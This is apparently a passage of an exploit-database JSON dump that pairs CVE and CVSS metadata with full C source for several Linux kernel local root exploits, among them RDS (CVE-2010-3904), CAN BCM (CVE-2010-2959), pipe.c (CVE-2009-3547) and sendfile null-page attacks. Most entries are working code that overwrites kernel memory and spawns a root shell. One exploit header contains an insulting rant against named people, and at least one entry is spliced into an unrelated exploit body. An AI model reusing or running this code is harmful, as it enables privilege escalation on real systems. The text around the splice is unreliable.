{\n\t\tiovs[i].iov_base = (void *) 
0x0;\n\t\tiovs[i].iov_len = 0;\n\t}\n\n\t/* overwrite saved ia32_sysret address on stack */\n\tiovs[STACK_OFFSET].iov_base = (void *) target;\n\tiovs[STACK_OFFSET].iov_len = 0x0246;\n\n\t/* force abort via EFAULT */\n\tfor (i = STACK_OFFSET + 1; i < IOVS; ++i) {\n\t\tiovs[i].iov_base = (void *) 0xffffffff00000000;\n\t\tiovs[i].iov_len = 0;\n\t}\n\n\t/* create econet socket */\n\teco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);\n\tif (eco_sock < 0) {\n\t\tprintf(\"[-] failed creating econet socket, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tmemset(&ifr, 0, sizeof(ifr));\n\tstrcpy(ifr.ifr_name, \"lo\");\n\n\t/* trick econet into associated with the loopback */\n\tret = ioctl(eco_sock, SIOCSIFADDR, &ifr);\n\tif (ret != 0) {\n\t\tprintf(\"[-] failed setting interface address, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tmemset(&eco_addr, 0, sizeof(eco_addr));\n\tmemset(&eco_msg, 0, sizeof(eco_msg));\n\teco_msg.msg_name = &eco_addr;\n\teco_msg.msg_namelen = sizeof(eco_addr);\n\teco_msg.msg_flags = 0;\n\teco_msg.msg_iov = &iovs[0];\n\teco_msg.msg_iovlen = IOVS;\n\n\tprintf(\"[+] upper child triggering stack overflow...\\n\");\n\n\t/* trigger the kstack overflow into lower child's kstack */\n\tret = sendmsg(eco_sock, &eco_msg, 0);\n\tif (ret != -1 || errno != EFAULT) {\n\t\tprintf(\"[-] sendmsg succeeded unexpectedly, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tclose(eco_sock);\n}\n\nvoid\ndo_child_lower(void)\n{\n\tint pid;\n\n\tprintf(\"[+] lower child spawning a helper...\\n\");\n\n\t/* fork off a helper to wait4 on */\n\tpid = fork();\n\tif (pid == 0) {\n\t\tprintf(\"[+] helper going to sleep...\\n\");\n\t\tsleep(5);\n\t\tprintf(\"[+] helper woke up\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] lower child calling compat_sys_wait4 on helper...\\n\");\n\n\t/* syscall(NR_WAIT4, pid, 0, 0, 0) */\n\tasm volatile (\n\t\t\"push %%rax\\n\"\n\t\t\"push %%rbx\\n\"\n\t\t\"push %%rcx\\n\"\n\t\t\"push %%rdx\\n\"\n\t\t\"push %%rsi\\n\"\n\t\t\"movl %0, %%eax\\n\"\n\t\t\"movl %1, 
%%ebx\\n\"\n\t\t\"movl %2, %%ecx\\n\"\n\t\t\"movl %3, %%edx\\n\"\n\t\t\"movl %4, %%esi\\n\"\n\t\t\"int $0x80\\n\"\n\t\t\"pop %%rsi\\n\"\n\t\t\"pop %%rdx\\n\"\n\t\t\"pop %%rcx\\n\"\n\t\t\"pop %%rbx\\n\"\n\t\t\"pop %%rax\\n\"\n\t\t:\n\t\t: \"r\"(NR_WAIT4), \"r\"(pid), \"r\"(0), \"r\"(0), \"r\"(0)\n\t\t: \"memory\", \"rax\", \"rbx\", \"rcx\", \"rdx\", \"rsi\"\n\t);\n\n\tprintf(\"[+] lower child returned from compat_sys_wait4\\n\");\n\n\tprintf(\"[+] parent's restart_block has been clobbered\\n\");\n\n\t/* signal parent that our fptr should now be clobbered */\n\tregion->parent = KSTACK_CLOBBER;\n}\n\nint\nmain(int argc, char **argv)\n{\n\tint type;\n\n\tif (sizeof(unsigned long) != 8) {\n\t\tprintf(\"[-] x86_64 only, sorry!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] looking for symbols...\\n\");\n \n\tcommit_creds = (_commit_creds) get_symbol(\"commit_creds\");\n\tif (!commit_creds) {\n\t\tprintf(\"[-] symbol table not available, aborting!\\n\");\n\t\texit(1);\n\t}\n \n\tprepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\n\tif (!prepare_kernel_cred) {\n\t\tprintf(\"[-] symbol table not available, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tia32_sysret = get_symbol(\"ia32_sysret\");\n\tif (!ia32_sysret) {\n\t\tprintf(\"[-] symbol table not available, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] spawning children to achieve adjacent kstacks...\\n\");\n\n\ttype = get_adjacent_kstacks();\n\n\tif (type == KSTACK_PARENT) {\n\t\tdo_parent();\n\t} else if (type == KSTACK_UPPER) {\n\t\tdo_child_upper();\n\t} else if (type == KSTACK_LOWER) {\n\t\tdo_child_lower();\n\t}\n\n\treturn 0;\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "cvss3": {}, "published": "2010-10-19T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.36-rc8 - RDS Protocol Local Privilege Escalation", "bulletinFamily": 
"exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3904"], "modified": "2010-10-19T00:00:00", "id": "EXPLOITPACK:80919A880D8F23D053A90FDF86EB8DAA", "href": "", "sourceData": "// source: http://www.vsecurity.com/resources/advisory/20101019-1/\n\n/* \n * Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit\n * CVE-2010-3904\n * by Dan Rosenberg <drosenberg@vsecurity.com>\n *\n * Copyright 2010 Virtual Security Research, LLC\n *\n * The handling functions for sending and receiving RDS messages\n * use unchecked __copy_*_user_inatomic functions without any\n * access checks on user-provided pointers. As a result, by\n * passing a kernel address as an iovec base address in recvmsg-style\n * calls, a local user can overwrite arbitrary kernel memory, which\n * can easily be used to escalate privileges to root. Alternatively,\n * an arbitrary kernel read can be performed via sendmsg calls.\n *\n * This exploit is simple - it resolves a few kernel symbols,\n * sets the security_ops to the default structure, then overwrites\n * a function pointer (ptrace_traceme) in that structure to point\n * to the payload. After triggering the payload, the original\n * value is restored. Hard-coding the offset of this function\n * pointer is a bit inelegant, but I wanted to keep it simple and\n * architecture-independent (i.e. 
no inline assembly).\n *\n * The vulnerability is yet another example of why you shouldn't\n * allow loading of random packet families unless you actually\n * need them.\n *\n * Greets to spender, kees, taviso, hawkes, team lollerskaters,\n * joberheide, bla, sts, and VSR\n *\n */\n\n\n#include <stdio.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <fcntl.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n#include <errno.h>\n#include <string.h>\n#include <sys/ptrace.h>\n#include <sys/utsname.h>\n\n#define RECVPORT 5555 \n#define SENDPORT 6666\n\nint prep_sock(int port)\n{\n\t\n\tint s, ret;\n\tstruct sockaddr_in addr;\n\n\ts = socket(PF_RDS, SOCK_SEQPACKET, 0);\n\n\tif(s < 0) {\n\t\tprintf(\"[*] Could not open socket.\\n\");\n\t\texit(-1);\n\t}\n\t\n\tmemset(&addr, 0, sizeof(addr));\n\n\taddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\taddr.sin_family = AF_INET;\n\taddr.sin_port = htons(port);\n\n\tret = bind(s, (struct sockaddr *)&addr, sizeof(addr));\n\n\tif(ret < 0) {\n\t\tprintf(\"[*] Could not bind socket.\\n\");\n\t\texit(-1);\n\t}\n\n\treturn s;\n\n}\n\nvoid get_message(unsigned long address, int sock)\n{\n\n\trecvfrom(sock, (void *)address, sizeof(void *), 0,\n\t\t NULL, NULL);\n\n}\n\nvoid send_message(unsigned long value, int sock)\n{\n\t\n\tint size, ret;\n\tstruct sockaddr_in recvaddr;\n\tstruct msghdr msg;\n\tstruct iovec iov;\n\tunsigned long buf;\n\t\n\tmemset(&recvaddr, 0, sizeof(recvaddr));\n\n\tsize = sizeof(recvaddr);\n\n\trecvaddr.sin_port = htons(RECVPORT);\n\trecvaddr.sin_family = AF_INET;\n\trecvaddr.sin_addr.s_addr = inet_addr(\"127.0.0.1\");\n\n\tmemset(&msg, 0, sizeof(msg));\n\t\n\tmsg.msg_name = &recvaddr;\n\tmsg.msg_namelen = sizeof(recvaddr);\n\tmsg.msg_iovlen = 1;\n\t\n\tbuf = value;\n\n\tiov.iov_len = sizeof(buf);\n\tiov.iov_base = &buf;\n\n\tmsg.msg_iov = &iov;\n\n\tret = sendmsg(sock, &msg, 0);\n\tif(ret < 0) {\n\t\tprintf(\"[*] Something went wrong sending.\\n\");\n\t\texit(-1);\n\t}\n}\n\nvoid 
write_to_mem(unsigned long addr, unsigned long value, int sendsock, int recvsock)\n{\n\n\tif(!fork()) {\n\t\t\tsleep(1);\n\t\t\tsend_message(value, sendsock);\n\t\t\texit(1);\n\t}\n\telse {\n\t\tget_message(addr, recvsock);\n\t\twait(NULL);\n\t}\n\n}\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n_commit_creds commit_creds;\n_prepare_kernel_cred prepare_kernel_cred;\n\nint __attribute__((regparm(3)))\ngetroot(void * file, void * vma)\n{\n\n\tcommit_creds(prepare_kernel_cred(0));\n\treturn -1;\t\n\n}\n\n/* thanks spender... */\nunsigned long get_kernel_sym(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy;\n\tchar sname[512];\n\tstruct utsname ver;\n\tint ret;\n\tint rep = 0;\n\tint oldstyle = 0;\n\n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (f == NULL) {\n\t\tf = fopen(\"/proc/ksyms\", \"r\");\n\t\tif (f == NULL)\n\t\t\tgoto fallback;\n\t\toldstyle = 1;\n\t}\n\nrepeat:\n\tret = 0;\n\twhile(ret != EOF) {\n\t\tif (!oldstyle)\n\t\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\telse {\n\t\t\tret = fscanf(f, \"%p %s\\n\", (void **)&addr, sname);\n\t\t\tif (ret == 2) {\n\t\t\t\tchar *p;\n\t\t\t\tif (strstr(sname, \"_O/\") || strstr(sname, \"_S.\"))\n\t\t\t\t\tcontinue;\n\t\t\t\tp = strrchr(sname, '_');\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, \"smp\", 3)) {\n\t\t\t\t\tp = p - 4;\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\n\t\t\t\t\t\tp--;\n\t\t\t\t\t*p = '\\0';\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfprintf(stdout, \" [+] Resolved %s to %p%s\\n\", name, (void *)addr, rep ? 
\" (via System.map)\" : \"\");\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n\n\tfclose(f);\n\tif (rep)\n\t\treturn 0;\nfallback:\n\t/* didn't find the symbol, let's retry with the System.map\n\t dedicated to the pointlessness of Russell Coker's SELinux\n\t test machine (why does he keep upgrading the kernel if\n\t \"all necessary security can be provided by SE Linux\"?)\n\t*/\n\tuname(&ver);\n\tif (strncmp(ver.release, \"2.6\", 3))\n\t\toldstyle = 1;\n\tsprintf(sname, \"/boot/System.map-%s\", ver.release);\n\tf = fopen(sname, \"r\");\n\tif (f == NULL)\n\t\treturn 0;\n\trep = 1;\n\tgoto repeat;\n}\n\nint main(int argc, char * argv[])\n{\n\tunsigned long sec_ops, def_ops, cap_ptrace, target;\n\tint sendsock, recvsock;\n\tstruct utsname ver;\n\n\tprintf(\"[*] Linux kernel >= 2.6.30 RDS socket exploit\\n\");\n\tprintf(\"[*] by Dan Rosenberg\\n\");\n\n\tuname(&ver);\n\n\tif(strncmp(ver.release, \"2.6.3\", 5)) {\n\t\tprintf(\"[*] Your kernel is not vulnerable.\\n\");\n\t\treturn -1;\n\t}\t\n\n\t/* Resolve addresses of relevant symbols */\n\tprintf(\"[*] Resolving kernel addresses...\\n\");\n\tsec_ops = get_kernel_sym(\"security_ops\");\n\tdef_ops = get_kernel_sym(\"default_security_ops\");\n\tcap_ptrace = get_kernel_sym(\"cap_ptrace_traceme\");\n\tcommit_creds = (_commit_creds) get_kernel_sym(\"commit_creds\");\n\tprepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym(\"prepare_kernel_cred\");\n\n\tif(!sec_ops || !def_ops || !cap_ptrace || !commit_creds || !prepare_kernel_cred) {\n\t\tprintf(\"[*] Failed to resolve kernel symbols.\\n\");\n\t\treturn -1;\n\t}\n\n\t/* Calculate target */\n\ttarget = def_ops + sizeof(void *) + ((11 + sizeof(void *)) & ~(sizeof(void *) - 1));\n\n\tsendsock = prep_sock(SENDPORT);\n\trecvsock = prep_sock(RECVPORT);\n\n\t/* Reset security ops */\n\tprintf(\"[*] Overwriting security ops...\\n\");\n\twrite_to_mem(sec_ops, def_ops, sendsock, recvsock);\n\n\t/* Overwrite ptrace_traceme security op fptr */\n\tprintf(\"[*] Overwriting 
function pointer...\\n\");\n\twrite_to_mem(target, (unsigned long)&getroot, sendsock, recvsock);\n\n\t/* Trigger the payload */\n\tprintf(\"[*] Triggering payload...\\n\");\n\tptrace(PTRACE_TRACEME, 1, NULL, NULL);\n\t\n\t/* Restore the ptrace_traceme security op */\n\tprintf(\"[*] Restoring function pointer...\\n\");\n\twrite_to_mem(target, cap_ptrace, sendsock, recvsock);\n\n\tif(getuid()) {\n\t\tprintf(\"[*] Exploit failed to get root.\\n\");\n\t\treturn -1;\n\t}\n\n\tprintf(\"[*] Got root!\\n\");\n\texecl(\"/bin/sh\", \"sh\", NULL);\n\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 2.6.36-rc1 (Ubuntu 10.04 2.6.32) - CAN BCM Local Privilege Escalation", "cvss3": {}, "published": "2010-08-27T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.36-rc1 (Ubuntu 10.04 2.6.32) - CAN BCM Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2959"], "modified": "2010-08-27T00:00:00", "id": "EXPLOITPACK:7198CA63BDD8344EDEAC346D002AFAFD", "href": "", "sourceData": "/*\n * i-CAN-haz-MODHARDEN.c\n *\n * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959\n *\n * Ben Hawkes discovered an integer overflow in the Controller Area Network\n * (CAN) subsystem when setting up frame content and filtering certain 
\n * messages. An attacker could send specially crafted CAN traffic to crash \n * the system or gain root privileges. \n *\n * Usage:\n *\n * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden\n * $ ./i-can-haz-modharden\n * ...\n * [+] launching root shell!\n * # id\n * uid=0(root) gid=0(root)\n *\n * Notes:\n *\n * The allocation pattern of the CAN BCM module gives us some desirable \n * properties for smashing the SLUB. We control the kmalloc with a 16-byte\n * granularity allowing us to place our allocation in the SLUB cache of our\n * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for \n * old-times sake). The allocation can also be made in its own discrete \n * stage before the overwrite which allows us to be a bit more conservative \n * in ensuring the proper layout of our SLUB cache.\n *\n * To exploit the vulnerability, we first create a BCM RX op with a crafted \n * nframes to trigger the integer overflow during the kmalloc. On the second\n * call to update the existing RX op, we bypass the E2BIG check since the \n * stored nframes in the op is large, yet has an insufficiently sized \n * allocation associated with it. We then have a controlled write into the \n * adjacent shmid_kernel object in the 96-byte SLUB cache.\n *\n * However, while we control the length of the SLUB overwrite via a \n * memcpy_fromiovec operation, there exists a memset operation that directly \n * follows which zeros out last_frames, likely an adjacent allocation, with \n * the same malformed length, effectively nullifying our shmid smash. 
To \n * work around this, we take advantage of the fact that copy_from_user can\n * perform partial writes on x86 and trigger an EFAULT by setting up a \n * truncated memory mapping as the source for the memcpy_fromiovec operation,\n * allowing us to smash the necessary amount of memory and then pop out and \n * return early before the memset operation occurs.\n *\n * We then perform a dry-run and detect the shmid smash via an EIDRM errno \n * from shmat() caused by an invalid ipc_perm sequence number. Once we're \n * sure we have a shmid_kernel under our control we re-smash it with the \n * malformed version and redirect control flow to our credential modifying\n * calls mapped in user space.\n *\n * Distros: please use grsecurity's MODHARDEN or SELinux's module_request \n * to restrict unprivileged loading of uncommon packet families. Allowing\n * the loading of poorly-written PF modules just adds a non-trivial and \n * unnecessary attack surface to the kernel. \n *\n * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports \n * easily to other vulnerable kernels/distros. 
:-}\n\t**\n\t** kernel_code() function will return to its previous status which means before sendfile() system call,\n\t** after operating upon a ring0(kernel mode) privilege level.\n\t** This will enhance the viablity of the attack code even though each kernel can have different CS and DS address.\n\t*/\n}\nvoid *kernel=kernel_code;\n\nint main(int argc,char *argv[])\n{\n\tint fd_in=0,fd_out=0,offset=1;\n\tvoid *zero_page;\n\n\tuid=getuid();\n\tgid=getgid();\n\tif(uid==0){\n\t\tfprintf(stderr,\"[-] check ur uid\\n\");\n\t\treturn -1;\n\t}\n\n\t/*\n\t** There are some cases that we need mprotect due to the dependency matter with SVR4. (however, I did not confirm it yet)\n\t*/\n\tif(personality(0xffffffff)==PER_SVR4){\n\t\tif(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){\n\t\t\tperror(\"[-] mprotect()\");\n\t\t\treturn -1;\n\t\t}\n\t}\n\telse if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){\n\t\t\tperror(\"[-] mmap()\");\n\t\t\treturn -1;\n\t}\n\t*(char *)0x00000000=0xff;\n\t*(char *)0x00000001=0x25;\n\t*(unsigned long *)0x00000002=(unsigned long)&kernel;\n\t*(char *)0x00000006=0xc3;\n\n\tif((fd_in=open(argv[0],O_RDONLY))==-1){\n\t\tperror(\"[-] open()\");\n\t\treturn -1;\n\t}\n\tif((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){\n\t\tif((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){\n\t\t\tperror(\"[-] socket()\");\n\t\t\treturn -1;\n\t\t}\n\t}\ngogossing:\n\t/*\n\t** Sometimes, the attacks can fail. 
To enlarge the possiblilty of attack,\n\t** an attacker can make all the processes runing under current user uid 0.\n\t*/\n\tif(sendfile(fd_out,fd_in,&offset,2)==-1){\n\t\tif(offset==0){\n\t\t\tperror(\"[-] sendfile()\");\n\t\t\treturn -1;\n\t\t}\n\t\tclose(fd_out);\n\t\tfd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);\n\t}\n\tif(getuid()==uid){\n\t\tif(offset){\n\t\t\toffset=0;\n\t\t}\n\t\tgoto gogossing; /* all process */\n\t}\n\tclose(fd_in);\n\tclose(fd_out);\n\n\texecl(\"/bin/sh\",\"sh\",\"-i\",NULL);\n\treturn 0;\n}\n\n/* eoc */\n\n// milw0rm.com [2009-08-24]", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 2.x (Android) - sock_sendpage() Local Privilege Escalation", "cvss3": {}, "published": "2009-08-18T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.x (Android) - sock_sendpage() Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2692"], "modified": "2009-08-18T00:00:00", "id": "EXPLOITPACK:FF3D313D03F8BCB90EE2F22064032248", "href": "", "sourceData": "Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.\n\nhttp://zenthought.org/content/file/android-root-2009-08-16-source\nExploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz)\n\n# milw0rm.com [2009-08-18]", "cvss": {"score": 7.2, "vector": 
"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2013-12-16T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.10 2.6.31.5 - pipe.c Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3547"], "modified": "2013-12-16T00:00:00", "id": "EXPLOITPACK:587E07B26CFC9328AECA2A6FF11BCAF8", "href": "", "sourceData": "/* exp_moosecox.c\n Watch a video of the exploit here:\n http://www.youtube.com/watch?v=jt81NvaOj5Y\n\n developed entirely by Ingo Molnar (exploit writer extraordinaire!) , \n thanks to Fotis Loukos for pointing the bug out to me -- neat bug! 
:)\n\n dedicated to the Red Hat employees who get paid to copy+paste my \n twitter and issue security advisories, their sweet \n acknowledgement policy, and general classiness\n see: https://bugzilla.redhat.com/show_activity.cgi?id=530490\n\n \"policy\" aside, there's a word for what you guys are doing: \"plagiarism\"\n in fact, i tested this one day by posting three links to twitter,\n without any discussion on any of them. the same day, those three\n (and only those three) links were assigned CVEs, even though two of \n them weren't even security bugs (it doesn't pay to copy+paste)\n\n official Ingo Molnar (that's me) policy for acknowledgement in \n exploits requires general douche-ness or plagiarization\n official policy further dictates immediate exploit release for\n embargoed, patched bug\n\n I'll be curious to see what the CVE statistics are like for the \n kernel this year when they get compiled next year -- I'm predicting \n that when someone's watching the sleepy watchers, a more personal \n interest is taken in doing the job that you're paid to do correctly.\n\n --------------------------------------------------------------------\n\n Special PS note to Theo (I can do this here because I know he'll \n never read it -- the guy is apparently oblivious to the entire world of \n security around him -- the same world that invents the protections \n years before him that he pats himself on the back for \"innovating\")\n Seriously though, it's incredible to me that an entire team \n of developers whose sole purpose is to develop a secure operating \n system can be so oblivious to the rest of the world. 
They haven't \n innovated since they replaced exploitable string copies with \n exploitable string truncations 6 or so years ago.\n\n The entire joke of a thread can be read here:\n http://www.pubbs.net/openbsd/200911/4582/\n \"Our focus therefore is always on finding innovative ideas which make \n bugs very hard to exploit succesfully.\"\n \"He's too busy watching monkey porn instead of\n building researching last-year's security technology that will stop \n an exploit technique that has been exploited multiple times.\"\n \"it seems that everyone else is slowly coming around to the\n same solution.\"\n\n So let's talk about this \"innovation\" of theirs with their \n implementation of mmap_min_addr:\n\n They implemented it in 2008, a year after Linux implemented it, a \n year after the public phrack article on the bug class, more than a \n year after my mail to dailydave with the first public Linux kernel \n exploit for the bug class, and over two years after UDEREF was \n implemented in PaX (providing complete protection against the smaller \n subset of null ptr dereference bugs and the larger class of invalid \n userland access in general).\n\n OpenBSD had a public null pointer dereference exploit (agp_ioctl()) \n published for its OS in January of 2007. It took them over a year \n and a half to implement the same feature that was implemented in \n Linux a few months after my public exploit in 2007.\n\n So how can it be that \"everyone else is slowly coming around to the \n same solution\" when \"everyone else\" came to that solution over a \n year before you Theo? In fact, I prediced this exact situation would \n happen back in 2007 in my DD post:\n http://lists.virus.org/dailydave-0703/msg00011.html\n \"Expect OpenBSD to independently invent a protection against null ptr \n deref bugs sometime in 2009.\"\n\n Let's talk about some more \"innovation\" -- position independent \n executables. 
PaX implemented position independent executables on \n Linux back in 2001 (ET_DYN). PIE binary support was added to GNU \n binutils in 2003. Those OpenBSD innovators implemented PIE binaries \n in 2008, 7 years after PaX. Innovation indeed!\n\n How about their W^X/ASLR innovation? These plagiarists have the \n audacity to announce on their press page:\n http://www.openbsd.org/press.html\n \"Microsoft borrows one of OpenBSD's security features for Vista, \n stack/library randomization, under the name Address Space Layout \n Randomization (ASLR). \"Until now, the feature has been most \n prominently used in the OpenBSD Unix variant and the PaX and Exec \n Shield security patches for Linux\"\"\n Borrowing one of your features? Where'd this ASLR acronym come from \n anyway? Oh that's right, PaX again -- when they published the first \n design and implementation of it, and coined the term, in July 2001.\n It covered the heap, mmap, and stack areas.\n OpenBSD implemented \"stack-gap randomization\" in 2003. Way to \n innovate!\n\n W^X, which is a horrible name as OpenBSD doesn't even enforce it with \n mprotect restrictions like PaX did from the beginning or even SELinux \n is doing now (from a 3rd party contribution modeled after PaX): \n PaX implemented true per-page non-executable page support, protecting \n binary data, the heap, and the stack, back in 2000.\n OpenBSD implemented it in 2003, requiring a full userland rebuild.\n The innovation is overwhelming!\n\n They keep coming up with the same exact \"innovations\" others came up \n with years before them. Their official explanation for where they \n got the W^X/ASLR ideas was a drunk guy came into their tent at one of \n their hack-a-thons and started talking about the idea. They had \n never heard of PaX when we asked them in 2003. 
Which makes the \n following involuntarily contributed private ICB logs from Phrack #66\n (Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:\n\n On some sunny day in July 2002 (t: Theo de Raadt):\n <cloder> why can't you just randomize the base\n <cloder> that's what PaX does\n <t> You've not been paying attention to what art's saying, or you don't \n understand yet, either case is one of think it through yourself.\n <cloder> whatever\n\n Only to see poetic justice in August 2003 (ttt: Theo again):\n\n <miod> more exactly, we heard of pax when they started bitching\n <ttt> miod, that was very well spoken.\n\n That wraps up our OpenBSD history lesson, in case anyone forgot it.\n PS -- enjoy that null ptr deref exploit just released for OpenBSD.\n\n --------------------------------------------------------------------\n\n Important final exploit notes:\n\n don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,\n or DEBUG_SPINLOCK are enabled and modify the structures below \n accordingly -- a fancier exploit would do this automatically\n\n I've broken the 2.4->2.6.10 version of the exploit and would like to see \n someone fix it ;) See below for more comments on this.\n*/\n\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <string.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <sched.h>\n#include <signal.h>\n#include <sys/syscall.h>\n#include <sys/utsname.h>\n#include \"exp_framework.h\"\n\nint pipefd[2];\nstruct exploit_state *exp_state;\nint is_old_kernel = 0;\n\nint go_go_speed_racer(void *unused)\n{\n int ret;\n\n while(!exp_state->got_ring0) {\n /* bust spinlock */\n *(unsigned int *)NULL = is_old_kernel ? 
0 : 1;\n ret = pipe(pipefd);\n if (!ret) {\n close(pipefd[0]);\n close(pipefd[1]);\n }\n }\n\n return 0;\n}\n\n/* <3 twiz/sgrakkyu */\nint start_thread(int (*f)(void *), void *arg)\n{\n char *stack = malloc(0x4000);\n int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);\n if (tid < 0) {\n printf(\"can't create thread\\n\");\n exit(1);\n }\n sleep(1);\n return tid;\n}\n\nchar *desc = \"MooseCox: Linux <= 2.6.31.5 pipe local root\";\nchar *cve = \"CVE-2009-3547\";\n\n#define PIPE_BUFFERS 16\n\n/* this changes on older kernels, but it doesn't matter to our method */\nstruct pipe_buf_operations {\n int can_merge;\n void *map;\n void *unmap;\n void *confirm;\n void *release;\n void *steal;\n void *get;\n};\n\nstruct pipe_buffer2620ornewer {\n void *page;\n unsigned int offset, len;\n void *ops;\n unsigned int flags;\n unsigned long private;\n};\n\nstruct 